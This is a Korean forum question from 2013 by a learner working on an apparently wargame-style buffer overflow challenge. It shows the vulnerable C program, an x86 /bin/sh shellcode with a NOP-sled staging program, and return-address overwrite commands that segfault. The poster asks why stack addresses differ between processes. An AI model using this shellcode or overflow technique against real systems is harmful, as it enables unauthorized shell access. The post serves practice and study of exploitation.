프로세스마다 할당되는 스택

글쓴이: Reper / 작성시간: 토, 2013/02/16 - 2:46오전

현재 버퍼 오버플로우를 공부하고 있습니다.

#include
#include

extern char **environ;

main(int argc, char *argv[])
{
char buffer[40];
int i;

if(argc != 2){
printf("argc must be two!\n");
exit(0);
}

for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}

if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}

strcpy(buffer, argv[1]);
printf("%s\n", buffer);

memset(buffer, 0, 40); // buffer의 메모리를 0으로 초기화
memset(argv[1], 0, strlen(argv[1])); // argv[1]의 메모리를 0으로 초기화
}

위 프로그램을 오버플로우 시켜서 쉘을 따내라는 문제를 풀고 있는데요.
그 프로그램은 환경변수, 주어진 버퍼도 쓰지 못하게 되어있고 argv 배열도 쓰지못하게 막아놨습니다.
따라서 스택의 공간 어딘가에 쉘코드를 올려놓고 리턴주소를 그곳으로 향하게 해야 하는 것 같은데요.
쉘코드를 심고 그 공간을 알아내기 위해 다음과 같이 코드를 작성했습니다.

#include
#include

char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

int main(void)
{
char buffer[1024];

// 쉘코드
memset(buffer, 0x90, 200);
memcpy(buffer+200, shellcode, sizeof(shellcode)-1);
memset(buffer+200+sizeof(shellcode)-1, 0x90, 16);

// 추측해야하는 버퍼의 주소
printf("buffer is at %p\n", buffer);

// 프로그램이 종료되지 않도록 무한 루프
for( ; ;)
;
}

공격할 프로그램을 실행하기 위해 위의 프로그램이 죽지않도록 밑과 같이 백그라운드로 실행 후,

[orge@localhost orge]$ ./exploit &
[1] 744
buffer is at 0xbffff738
[orge@localhost orge]$ ps
PID TTY TIME CMD
645 pts/0 00:00:00 bash
726 pts/0 00:00:00 bash2
744 pts/0 00:00:10 exploit
745 pts/0 00:00:00 ps

위의 프로그램이 뽑아낸 리턴주소의 오차를 생각해 다시 +40 을시킨 리턴주소를
공격할 프로그램에 넣고 밑과 같이 리턴주소를 제대로 뒤집어씌웠습니다.

[orge@localhost orge]$ ./troll $(perl -e 'print "\x38\x7f\xff\xbf"x12';)
��
Segmentation fault
[orge@localhost orge]$ ./troll $(perl -e 'print "\x60\x7f\xff\xbf"x12';)
��
Segmentation fault

그런데 세그폴트가 나더군요. 다른 값들을 몇번 대입해봐도 세그폴트가 자꾸 났습니다.
혹시나 안들어간건아닐까하고 gdb로 troll 프로그램을 띄운 후
리턴주소를 디버깅해보니 제가 원하던 NOP과 쉘코드는 들어가있지않고 엉뚱한 값들만 들어가있었습니다.

왜일까 하고 생각을해보니...
예전에 프로세스별로 메모리는 나누어져 관리된다는 사실을 어떤 문서로 부터 공부한 기억이 떠올랐습니다.

첨부된 그림파일을 보면 저렇게 세그먼트별로 나누어져 그 따로따로 관리되고 있는 스택에도
같은 스택의 주소가 프로그램별로 여러개 존재할수가 있나요 ?
저는 제가 심은 쉘코드가 그 이유때문에 먹히지 않는건가요...?

답답해서 이렇게 질문을 드립니다...

File attachments:

첨부	파일 크기
stack.PNG	29.21 KB

Forums:

프로그래밍 QnA

댓글 달기

이름

제목

댓글 *

텍스트 포맷에 대한 자세한 정보

텍스트 양식

Filtered HTML

텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>
다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

BBCode

텍스트에 BBCode 태그를 사용할 수 있습니다. URL은 자동으로 링크 됩니다.
다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param>
web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.

Textile

다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
You can use Textile markup to format text.
사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Markdown

다음 태그를 이용하여 소스 코드 구문 강조를 할 수 있습니다: <code>, <blockcode>, <apache>, <applescript>, <autoconf>, <awk>, <bash>, <c>, <cpp>, <css>, <diff>, <drupal5>, <drupal6>, <gdb>, <html>, <html5>, <java>, <javascript>, <ldif>, <lua>, <make>, <mysql>, <perl>, <perl6>, <php>, <pgsql>, <proftpd>, <python>, <reg>, <spec>, <ruby>. 지원하는 태그 형식: <foo>, [foo].
Quick Tips:
- Two or more spaces at a line's end = Line break
- Double returns = Paragraph
- *Single asterisks* or _single underscores_ = Emphasis
- **Double** or __double__ = Strong
- This is [a link](http://the.link.example.com "The optional title text")
For complete details on the Markdown syntax, see the Markdown documentation and Markdown Extra documentation for tables, footnotes, and more.
web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
사용할 수 있는 HTML 태그: <p><div><span><br><a><em><strong><del><ins><b><i><u><s><pre><code><cite><blockquote><ul><ol><li><dl><dt><dd><table><tr><td><th><thead><tbody><h1><h2><h3><h4><h5><h6><img><embed><object><param><hr>

Plain text

HTML 태그를 사용할 수 없습니다.
web 주소와/이메일 주소를 클릭할 수 있는 링크로 자동으로 바꿉니다.
줄과 단락은 자동으로 분리됩니다.

CAPTCHA

이것은 자동으로 스팸을 올리는 것을 막기 위해서 제공됩니다.

부 메뉴

프로세스마다 할당되는 스택

댓글 달기

Filtered HTML

BBCode

Textile

Markdown

Plain text

주 메뉴

둘러보기

부 메뉴

현재 위치

프로세스마다 할당되는 스택

댓글 달기

Filtered HTML

BBCode

Textile

Markdown

Plain text

주 메뉴

검색 폼

둘러보기

사용자 로그인

Oauth2 Login :